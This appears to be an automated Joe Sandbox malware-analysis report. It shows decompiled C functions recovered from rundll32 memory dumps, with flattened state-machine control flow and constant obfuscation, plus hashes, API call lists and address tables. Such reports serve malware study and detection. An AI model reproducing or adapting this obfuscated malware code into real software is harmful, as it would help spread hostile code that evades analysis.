                                                                                                                                                            				_t190 = 0x68;
                                                                                                                                                            				_v80 = _v80 * 0x4b;
                                                                                                                                                            				_v80 = _v80 << 2;
                                                                                                                                                            				_v80 = _v80 ^ 0x965c2e63;
                                                                                                                                                            				_v56 = 0xfc1806;
                                                                                                                                                            				_v56 = _v56 + 0xffffb57d;
                                                                                                                                                            				_v56 = _v56 | 0x299c1b97;
                                                                                                                                                            				_v56 = _v56 ^ 0x29fc2736;
                                                                                                                                                            				_v44 = 0x81586;
                                                                                                                                                            				_v44 = _v44 | 0xba5390c4;
                                                                                                                                                            				_v44 = _v44 ^ 0xba584850;
                                                                                                                                                            				_v60 = 0x52e6aa;
                                                                                                                                                            				_v60 = _v60 >> 0xa;
                                                                                                                                                            				_v60 = _v60 * 0x28;
                                                                                                                                                            				_v60 = _v60 ^ 0x00066c4e;
                                                                                                                                                            				_v48 = 0x7a334;
                                                                                                                                                            				_v48 = _v48 + 0xfffff5af;
                                                                                                                                                            				_v48 = _v48 ^ 0x0009652d;
                                                                                                                                                            				_v52 = 0x3bf8e8;
                                                                                                                                                            				_v52 = _v52 / _t190;
                                                                                                                                                            				_v52 = _v52 ^ 0x00025bcb;
                                                                                                                                                            				_v64 = 0xacc490;
                                                                                                                                                            				_t191 = 0x6f;
                                                                                                                                                            				_v64 = _v64 / _t191;
                                                                                                                                                            				_v64 = _v64 ^ 0xce7acdce;
                                                                                                                                                            				_v64 = _v64 ^ 0xce756fa5;
                                                                                                                                                            				_v88 = 0x557b83;
                                                                                                                                                            				_v88 = _v88 ^ 0xfc4fd146;
                                                                                                                                                            				_v88 = _v88 ^ 0x87bb4e9a;
                                                                                                                                                            				_v88 = _v88 ^ 0x18fbc6ce;
                                                                                                                                                            				_v88 = _v88 ^ 0x635c68ef;
                                                                                                                                                            				_v24 = 0xa24557;
                                                                                                                                                            				_t192 = 0x23;
                                                                                                                                                            				_v24 = _v24 / _t192;
                                                                                                                                                            				_v24 = _v24 ^ 0x00019ec3;
                                                                                                                                                            				_v72 = 0x274d3f;
                                                                                                                                                            				_v72 = _v72 + 0x3236;
                                                                                                                                                            				_v72 = _v72 + 0x71a1;
                                                                                                                                                            				_v72 = _v72 + 0x1749;
                                                                                                                                                            				_v72 = _v72 ^ 0x0028bc49;
                                                                                                                                                            				_v32 = 0x96c762;
                                                                                                                                                            				_t193 = 0x44;
                                                                                                                                                            				_v32 = _v32 / _t193;
                                                                                                                                                            				_v32 = _v32 ^ 0x000b5918;
                                                                                                                                                            				_v76 = 0x2f082c;
                                                                                                                                                            				_v76 = _v76 + 0x52f3;
                                                                                                                                                            				_v76 = _v76 + 0x7ae4;
                                                                                                                                                            				_v76 = _v76 ^ 0x81d2744f;
                                                                                                                                                            				_v76 = _v76 ^ 0x81f68fa5;
                                                                                                                                                            				_v36 = 0x9357ce;
                                                                                                                                                            				_v36 = _v36 + 0xfffffb26;
                                                                                                                                                            				_v36 = _v36 ^ 0x009b03e6;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t196 != 0x4d42949) {
                                                                                                                                                            						if(_t196 == 0x5adc597) {
                                                                                                                                                            							_t196 = 0x4d42949;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t196 == 0x78e32ab) {
                                                                                                                                                            								E0038847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t196 != 0xf2775cd) {
                                                                                                                                                            									goto L11;
                                                                                                                                                            								} else {
                                                                                                                                                            									_push(_t196);
                                                                                                                                                            									_push(_t196);
                                                                                                                                                            									_t214 = E00377FF2(_v20 + _v20);
                                                                                                                                                            									if(_t214 != 0) {
                                                                                                                                                            										_t196 = 0x78e32ab;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L14:
                                                                                                                                                            						return _t214;
                                                                                                                                                            					}
                                                                                                                                                            					_t179 = E0038847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
                                                                                                                                                            					_t217 =  &(_t217[8]);
                                                                                                                                                            					if(_t179 == 0) {
                                                                                                                                                            						_t196 = 0xc32537b;
                                                                                                                                                            						goto L11;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t196 = 0xf2775cd;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L14;
                                                                                                                                                            					L11:
                                                                                                                                                            				} while (_t196 != 0xc32537b);
                                                                                                                                                            				goto L14;
                                                                                                                                                            			}




































                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -e$62$?M'$h\c$z
                                                                                                                                                            • API String ID: 0-1842174784
                                                                                                                                                            • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                                            • Instruction ID: f694b65c4af326c9de935e4d5bcde5507e686281608537ea2cf5514ccce6d03f
                                                                                                                                                            • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                                            • Instruction Fuzzy Hash: 20812F715093819FD3A9CF65C58991FBBF5FBC9758F408A0CF29586260D3B6DA088F42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0038BE27(intOrPtr* __ecx) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				char _v320;
                                                                                                                                                            				char _t133;
                                                                                                                                                            				signed int _t136;
                                                                                                                                                            				void* _t139;
                                                                                                                                                            				signed int _t141;
                                                                                                                                                            				signed int _t142;
                                                                                                                                                            				signed int _t143;
                                                                                                                                                            				char* _t144;
                                                                                                                                                            				intOrPtr* _t163;
                                                                                                                                                            				void* _t164;
                                                                                                                                                            
                                                                                                                                                            				_v40 = 0x365269;
                                                                                                                                                            				_v40 = _v40 >> 7;
                                                                                                                                                            				_v40 = _v40 ^ 0x00099806;
                                                                                                                                                            				_v16 = 0x620947;
                                                                                                                                                            				_v16 = _v16 + 0x25da;
                                                                                                                                                            				_v16 = _v16 | 0xf0dff1a3;
                                                                                                                                                            				_v16 = _v16 + 0xffff8fd5;
                                                                                                                                                            				_v16 = _v16 ^ 0xf0f65193;
                                                                                                                                                            				_v60 = 0x4a6911;
                                                                                                                                                            				_v60 = _v60 >> 2;
                                                                                                                                                            				_v60 = _v60 ^ 0x0015bfec;
                                                                                                                                                            				_v32 = 0xee641f;
                                                                                                                                                            				_v32 = _v32 ^ 0x54466854;
                                                                                                                                                            				_v32 = _v32 ^ 0x51df3278;
                                                                                                                                                            				_v32 = _v32 ^ 0x057124b2;
                                                                                                                                                            				_v36 = 0x2245a1;
                                                                                                                                                            				_t163 = __ecx;
                                                                                                                                                            				_t141 = 0x59;
                                                                                                                                                            				_v36 = _v36 / _t141;
                                                                                                                                                            				_t142 = 0x7c;
                                                                                                                                                            				_v36 = _v36 / _t142;
                                                                                                                                                            				_v36 = _v36 ^ 0x00022b59;
                                                                                                                                                            				_v52 = 0x17e728;
                                                                                                                                                            				_v52 = _v52 << 7;
                                                                                                                                                            				_v52 = _v52 ^ 0x0bfefc33;
                                                                                                                                                            				_v24 = 0x5a7c12;
                                                                                                                                                            				_v24 = _v24 + 0xffff6a30;
                                                                                                                                                            				_v24 = _v24 + 0xb9bd;
                                                                                                                                                            				_v24 = _v24 ^ 0x00522d4c;
                                                                                                                                                            				_v8 = 0x70b293;
                                                                                                                                                            				_v8 = _v8 ^ 0xb7f64013;
                                                                                                                                                            				_v8 = _v8 | 0x98950303;
                                                                                                                                                            				_v8 = _v8 << 0x10;
                                                                                                                                                            				_v8 = _v8 ^ 0xf38d6f21;
                                                                                                                                                            				_v28 = 0x5e48e6;
                                                                                                                                                            				_v28 = _v28 >> 2;
                                                                                                                                                            				_v28 = _v28 << 0xf;
                                                                                                                                                            				_v28 = _v28 ^ 0xc917f664;
                                                                                                                                                            				_v44 = 0xd34be4;
                                                                                                                                                            				_v44 = _v44 ^ 0x1af04c78;
                                                                                                                                                            				_v44 = _v44 ^ 0x1a25cf5b;
                                                                                                                                                            				_v56 = 0x13a2c8;
                                                                                                                                                            				_v56 = _v56 ^ 0x00107e6c;
                                                                                                                                                            				_v20 = 0x6acc1;
                                                                                                                                                            				_t143 = 0x48;
                                                                                                                                                            				_v20 = _v20 * 0x75;
                                                                                                                                                            				_v20 = _v20 | 0x5ce04716;
                                                                                                                                                            				_v20 = _v20 ^ 0xfe39b07b;
                                                                                                                                                            				_v20 = _v20 ^ 0xa1d6ae77;
                                                                                                                                                            				_v48 = 0x9d30cb;
                                                                                                                                                            				_t144 =  &_v320;
                                                                                                                                                            				_v48 = _v48 / _t143;
                                                                                                                                                            				_v48 = _v48 ^ 0x00028c5d;
                                                                                                                                                            				_v12 = 0x456efe;
                                                                                                                                                            				_v12 = _v12 + 0xffff4082;
                                                                                                                                                            				_v12 = _v12 >> 1;
                                                                                                                                                            				_v12 = _v12 ^ 0xdbb5e427;
                                                                                                                                                            				_v12 = _v12 ^ 0xdb99f5c8;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					_t133 =  *_t163;
                                                                                                                                                            					if(_t133 == 0) {
                                                                                                                                                            						break;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t133 == 0x2e) {
                                                                                                                                                            						 *_t144 = 0;
                                                                                                                                                            					} else {
                                                                                                                                                            						 *_t144 = _t133;
                                                                                                                                                            						_t144 = _t144 + 1;
                                                                                                                                                            						_t163 = _t163 + 1;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					L6:
                                                                                                                                                            					_t164 = E0037ADE6(_v40, _v16,  &_v320, _v60);
                                                                                                                                                            					if(_t164 != 0) {
                                                                                                                                                            						L8:
                                                                                                                                                            						_t136 = E0038DBEA(_t163 + 1, _v8, _v28, _v44);
                                                                                                                                                            						_push(_v12);
                                                                                                                                                            						_push(_t136 ^ 0x2ac2611c);
                                                                                                                                                            						_push(_v48);
                                                                                                                                                            						_push(_t164);
                                                                                                                                                            						return E0037CDCD(_v56, _v20);
                                                                                                                                                            					}
                                                                                                                                                            					_t139 = E0038CADF(_v32,  &_v320, _v36, _v52);
                                                                                                                                                            					_t164 = _t139;
                                                                                                                                                            					if(_t164 != 0) {
                                                                                                                                                            						goto L8;
                                                                                                                                                            					}
                                                                                                                                                            					return _t139;
                                                                                                                                                            				}
                                                                                                                                                            				goto L6;
                                                                                                                                                            			}



























                                                                                                                                                            0x0038bfb5
                                                                                                                                                            0x0038bfb7
                                                                                                                                                            0x0038bfb8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bfb8
                                                                                                                                                            0x0038bfc4
                                                                                                                                                            0x0038bfd9
                                                                                                                                                            0x0038bfdf
                                                                                                                                                            0x0038bffd
                                                                                                                                                            0x0038c00c
                                                                                                                                                            0x0038c011
                                                                                                                                                            0x0038c019
                                                                                                                                                            0x0038c01a
                                                                                                                                                            0x0038c023
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c029
                                                                                                                                                            0x0038bff0
                                                                                                                                                            0x0038bff5
                                                                                                                                                            0x0038bffb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c031
                                                                                                                                                            0x0038c031
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                                                            • API String ID: 0-1567385930
                                                                                                                                                            • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                                            • Instruction ID: 0c77794328ac54f7c6505215bbce161bb0b47e594ec8c78ad78ad59109c88a62
                                                                                                                                                            • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                                            • Instruction Fuzzy Hash: 8C512171C0531AEBDF19DFA4D94A8EEFBB1FB08314F208199D512BA260C7B51A45CFA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                                                            • SendMessageA.USER32 ref: 1001B48B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: State$LongMessageSendWindow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1063413437-0
                                                                                                                                                            • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                                            • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                                                            • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                                            • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                            			E003820BA() {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				signed int _v524;
                                                                                                                                                            				unsigned int _v528;
                                                                                                                                                            				signed int _v532;
                                                                                                                                                            				signed int _v536;
                                                                                                                                                            				signed int _v540;
                                                                                                                                                            				signed int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				signed int _v552;
                                                                                                                                                            				signed int _v556;
                                                                                                                                                            				signed int _v560;
                                                                                                                                                            				signed int _v564;
                                                                                                                                                            				signed int _v568;
                                                                                                                                                            				signed int _v572;
                                                                                                                                                            				signed int _v576;
                                                                                                                                                            				signed int _v580;
                                                                                                                                                            				signed int _v584;
                                                                                                                                                            				signed int _v588;
                                                                                                                                                            				signed int _v592;
                                                                                                                                                            				signed int _v596;
                                                                                                                                                            				signed int _v600;
                                                                                                                                                            				signed int _v604;
                                                                                                                                                            				signed int _v608;
                                                                                                                                                            				signed int _v612;
                                                                                                                                                            				signed int _v616;
                                                                                                                                                            				signed int _v620;
                                                                                                                                                            				signed int _v624;
                                                                                                                                                            				signed int _t227;
                                                                                                                                                            				intOrPtr _t228;
                                                                                                                                                            				signed int _t230;
                                                                                                                                                            				void* _t231;
                                                                                                                                                            				intOrPtr _t235;
                                                                                                                                                            				intOrPtr _t245;
                                                                                                                                                            				void* _t247;
                                                                                                                                                            				intOrPtr _t254;
                                                                                                                                                            				signed int _t272;
                                                                                                                                                            				signed int _t273;
                                                                                                                                                            				signed int _t274;
                                                                                                                                                            				signed int _t275;
                                                                                                                                                            				void* _t277;
                                                                                                                                                            				signed int* _t279;
                                                                                                                                                            				void* _t283;
                                                                                                                                                            
                                                                                                                                                            				_t279 =  &_v624;
                                                                                                                                                            				_v612 = 0x15bebb;
                                                                                                                                                            				_v612 = _v612 ^ 0x0c09d82a;
                                                                                                                                                            				_t247 = 0x7e01d7;
                                                                                                                                                            				_v612 = _v612 + 0xffff69e9;
                                                                                                                                                            				_v612 = _v612 ^ 0xcffb1e8d;
                                                                                                                                                            				_v612 = _v612 ^ 0xc3e0ceeb;
                                                                                                                                                            				_v596 = 0xb5bc7f;
                                                                                                                                                            				_v596 = _v596 << 0xa;
                                                                                                                                                            				_v596 = _v596 + 0xbaa7;
                                                                                                                                                            				_v596 = _v596 ^ 0xd6f2b68e;
                                                                                                                                                            				_v600 = 0x5909af;
                                                                                                                                                            				_v600 = _v600 ^ 0x0096463d;
                                                                                                                                                            				_v600 = _v600 >> 3;
                                                                                                                                                            				_v600 = _v600 ^ 0x0016e9cd;
                                                                                                                                                            				_v548 = 0x801d18;
                                                                                                                                                            				_v548 = _v548 + 0xffffc800;
                                                                                                                                                            				_v548 = _v548 ^ 0x0070ca5a;
                                                                                                                                                            				_v580 = 0x2361dd;
                                                                                                                                                            				_v580 = _v580 * 0x6f;
                                                                                                                                                            				_t277 = 0;
                                                                                                                                                            				_v580 = _v580 << 0xe;
                                                                                                                                                            				_v580 = _v580 ^ 0xdbb34e1e;
                                                                                                                                                            				_v528 = 0x864281;
                                                                                                                                                            				_v528 = _v528 >> 0xc;
                                                                                                                                                            				_v528 = _v528 ^ 0x0000b217;
                                                                                                                                                            				_v560 = 0x478502;
                                                                                                                                                            				_v560 = _v560 | 0x3d47d1eb;
                                                                                                                                                            				_v560 = _v560 ^ 0x3d4c1a49;
                                                                                                                                                            				_v540 = 0x8f961f;
                                                                                                                                                            				_v540 = _v540 >> 0xc;
                                                                                                                                                            				_v540 = _v540 ^ 0x000d133d;
                                                                                                                                                            				_v572 = 0xef4b2;
                                                                                                                                                            				_v572 = _v572 << 0xd;
                                                                                                                                                            				_v572 = _v572 + 0xffff85b1;
                                                                                                                                                            				_v572 = _v572 ^ 0xde949f86;
                                                                                                                                                            				_v608 = 0x8e969a;
                                                                                                                                                            				_v608 = _v608 << 0xd;
                                                                                                                                                            				_t272 = 0x21;
                                                                                                                                                            				_v608 = _v608 / _t272;
                                                                                                                                                            				_t273 = 0x2f;
                                                                                                                                                            				_v608 = _v608 / _t273;
                                                                                                                                                            				_v608 = _v608 ^ 0x002a10b8;
                                                                                                                                                            				_v620 = 0x864bbd;
                                                                                                                                                            				_v620 = _v620 << 0x10;
                                                                                                                                                            				_v620 = _v620 + 0x87ba;
                                                                                                                                                            				_v620 = _v620 + 0x936f;
                                                                                                                                                            				_v620 = _v620 ^ 0x4bb78bcc;
                                                                                                                                                            				_v564 = 0xfb8a17;
                                                                                                                                                            				_t274 = 0x62;
                                                                                                                                                            				_v564 = _v564 * 0x63;
                                                                                                                                                            				_v564 = _v564 ^ 0x61429d97;
                                                                                                                                                            				_v576 = 0x222f;
                                                                                                                                                            				_v576 = _v576 >> 4;
                                                                                                                                                            				_v576 = _v576 ^ 0xf39884cf;
                                                                                                                                                            				_v576 = _v576 ^ 0xf39d4647;
                                                                                                                                                            				_v556 = 0x6068cb;
                                                                                                                                                            				_v556 = _v556 ^ 0xfe1a734d;
                                                                                                                                                            				_v556 = _v556 ^ 0xfe79d9b4;
                                                                                                                                                            				_v616 = 0xc46e23;
                                                                                                                                                            				_v616 = _v616 >> 2;
                                                                                                                                                            				_v616 = _v616 / _t274;
                                                                                                                                                            				_v616 = _v616 * 0x76;
                                                                                                                                                            				_v616 = _v616 ^ 0x003e2a5a;
                                                                                                                                                            				_v624 = 0x4617e4;
                                                                                                                                                            				_v624 = _v624 + 0xffff4d74;
                                                                                                                                                            				_v624 = _v624 ^ 0x9dcdfd87;
                                                                                                                                                            				_v624 = _v624 + 0x3fd8;
                                                                                                                                                            				_v624 = _v624 ^ 0x9d89a5c2;
                                                                                                                                                            				_v588 = 0x3a0167;
                                                                                                                                                            				_v588 = _v588 << 1;
                                                                                                                                                            				_v588 = _v588 + 0xffff1a51;
                                                                                                                                                            				_v588 = _v588 ^ 0x00728a40;
                                                                                                                                                            				_v532 = 0x3a363e;
                                                                                                                                                            				_v532 = _v532 ^ 0xe52a74a2;
                                                                                                                                                            				_v532 = _v532 ^ 0xe514694b;
                                                                                                                                                            				_v544 = 0x52d5cb;
                                                                                                                                                            				_v544 = _v544 | 0x185d0a08;
                                                                                                                                                            				_v544 = _v544 ^ 0x18524fe5;
                                                                                                                                                            				_v584 = 0x37b3aa;
                                                                                                                                                            				_v584 = _v584 + 0xebef;
                                                                                                                                                            				_t275 = 0x72;
                                                                                                                                                            				_v584 = _v584 * 0x28;
                                                                                                                                                            				_v584 = _v584 ^ 0x08d0b087;
                                                                                                                                                            				_v592 = 0xa4bebe;
                                                                                                                                                            				_v592 = _v592 >> 8;
                                                                                                                                                            				_v592 = _v592 | 0x739fbd45;
                                                                                                                                                            				_v592 = _v592 ^ 0x739593e3;
                                                                                                                                                            				_v552 = 0x17b1c;
                                                                                                                                                            				_v552 = _v552 << 0xe;
                                                                                                                                                            				_v552 = _v552 ^ 0x5ecd7403;
                                                                                                                                                            				_v568 = 0x403d75;
                                                                                                                                                            				_v568 = _v568 >> 3;
                                                                                                                                                            				_v568 = _v568 | 0x80b15bc0;
                                                                                                                                                            				_v568 = _v568 ^ 0x80b9a416;
                                                                                                                                                            				_v536 = 0x2ed64e;
                                                                                                                                                            				_t276 = _v524;
                                                                                                                                                            				_v536 = _v536 / _t275;
                                                                                                                                                            				_v536 = _v536 ^ 0x00033d67;
                                                                                                                                                            				_v604 = 0x8b403d;
                                                                                                                                                            				_v604 = _v604 + 0xffff3866;
                                                                                                                                                            				_v604 = _v604 << 8;
                                                                                                                                                            				_v604 = _v604 ^ 0x8a7a6cd3;
                                                                                                                                                            				goto L1;
                                                                                                                                                            				do {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L1:
                                                                                                                                                            						_t283 = _t247 - 0x73dad95;
                                                                                                                                                            						if(_t283 > 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t283 == 0) {
                                                                                                                                                            							E0038DA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
                                                                                                                                                            							_t235 = E00372051(_v536,  &_v520, _v604);
                                                                                                                                                            							_t254 =  *0x393e10; // 0x0
                                                                                                                                                            							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t247 == 0x7e01d7) {
                                                                                                                                                            								_push(_t247);
                                                                                                                                                            								_push(_t247);
                                                                                                                                                            								 *0x393e10 = E00377FF2(0x45c);
                                                                                                                                                            								_t247 = 0x8643fcd;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t247 == 0xd34913) {
                                                                                                                                                            									_t247 = 0x148c4fa;
                                                                                                                                                            									_v524 = _v596;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t247 == 0xfeb697) {
                                                                                                                                                            										_v524 = _v612;
                                                                                                                                                            										goto L8;
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t247 != 0x148c4fa) {
                                                                                                                                                            											goto L20;
                                                                                                                                                            										} else {
                                                                                                                                                            											E00388F9E(_v620, _v564, _v576, _v556, _t276);
                                                                                                                                                            											_t279 =  &(_t279[3]);
                                                                                                                                                            											L8:
                                                                                                                                                            											_t247 = 0xac90332;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L23:
                                                                                                                                                            						return _t277;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t247 - 0x8643fcd;
                                                                                                                                                            					if(_t247 == 0x8643fcd) {
                                                                                                                                                            						_t227 = E0037912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
                                                                                                                                                            						_t276 = _t227;
                                                                                                                                                            						_t279 =  &(_t279[5]);
                                                                                                                                                            						__eflags = _t227;
                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                            							_t247 = 0xfeb697;
                                                                                                                                                            							goto L20;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t245 =  *0x393e10; // 0x0
                                                                                                                                                            							 *((intOrPtr*)(_t245 + 0x450)) = 1;
                                                                                                                                                            							_t247 = 0xd34913;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t247 - 0xac90332;
                                                                                                                                                            						if(_t247 == 0xac90332) {
                                                                                                                                                            							_push(_v532);
                                                                                                                                                            							_push(_v524);
                                                                                                                                                            							_push(_v588);
                                                                                                                                                            							_t228 =  *0x393e10; // 0x0
                                                                                                                                                            							_push(_t228 + 0x23c);
                                                                                                                                                            							_t230 = E003846BB(_v616, _v624);
                                                                                                                                                            							_t279 = _t279 - 0xc + 0x1c;
                                                                                                                                                            							_t247 = 0xe2d9513;
                                                                                                                                                            							__eflags = _t230;
                                                                                                                                                            							_t231 = 1;
                                                                                                                                                            							_t277 =  ==  ? _t231 : _t277;
                                                                                                                                                            							goto L1;
                                                                                                                                                            						} else {
                                                                                                                                                            							__eflags = _t247 - 0xe2d9513;
                                                                                                                                                            							if(_t247 != 0xe2d9513) {
                                                                                                                                                            								goto L20;
                                                                                                                                                            							} else {
                                                                                                                                                            								E0037A55F();
                                                                                                                                                            								_t247 = 0x73dad95;
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					goto L23;
                                                                                                                                                            					L20:
                                                                                                                                                            					__eflags = _t247 - 0x13a2d4a;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L23;
                                                                                                                                                            			}

                                                                                                                                                            0x003821f9
                                                                                                                                                            0x00382201
                                                                                                                                                            0x00382206
                                                                                                                                                            0x0038220e
                                                                                                                                                            0x00382216
                                                                                                                                                            0x0038221e
                                                                                                                                                            0x0038222b
                                                                                                                                                            0x0038222c
                                                                                                                                                            0x00382230
                                                                                                                                                            0x00382238
                                                                                                                                                            0x00382240
                                                                                                                                                            0x00382245
                                                                                                                                                            0x0038224d
                                                                                                                                                            0x00382255
                                                                                                                                                            0x0038225d
                                                                                                                                                            0x00382265
                                                                                                                                                            0x0038226d
                                                                                                                                                            0x00382275
                                                                                                                                                            0x00382280
                                                                                                                                                            0x00382289
                                                                                                                                                            0x0038228d
                                                                                                                                                            0x00382297
                                                                                                                                                            0x003822a4
                                                                                                                                                            0x003822b1
                                                                                                                                                            0x003822b9
                                                                                                                                                            0x003822c1
                                                                                                                                                            0x003822c9
                                                                                                                                                            0x003822d1
                                                                                                                                                            0x003822d5
                                                                                                                                                            0x003822dd
                                                                                                                                                            0x003822e5
                                                                                                                                                            0x003822ed
                                                                                                                                                            0x003822f5
                                                                                                                                                            0x003822fd
                                                                                                                                                            0x00382305
                                                                                                                                                            0x0038230d
                                                                                                                                                            0x00382315
                                                                                                                                                            0x0038231d
                                                                                                                                                            0x0038232c
                                                                                                                                                            0x0038232d
                                                                                                                                                            0x00382331
                                                                                                                                                            0x00382339
                                                                                                                                                            0x00382341
                                                                                                                                                            0x00382346
                                                                                                                                                            0x0038234e
                                                                                                                                                            0x00382356
                                                                                                                                                            0x0038235e
                                                                                                                                                            0x00382363
                                                                                                                                                            0x0038236b
                                                                                                                                                            0x00382373
                                                                                                                                                            0x00382378
                                                                                                                                                            0x00382380
                                                                                                                                                            0x00382388
                                                                                                                                                            0x00382396
                                                                                                                                                            0x0038239a
                                                                                                                                                            0x0038239e
                                                                                                                                                            0x003823a6
                                                                                                                                                            0x003823ae
                                                                                                                                                            0x003823b6
                                                                                                                                                            0x003823bb
                                                                                                                                                            0x003823bb
                                                                                                                                                            0x003823c3
                                                                                                                                                            0x003823c3
                                                                                                                                                            0x003823c3
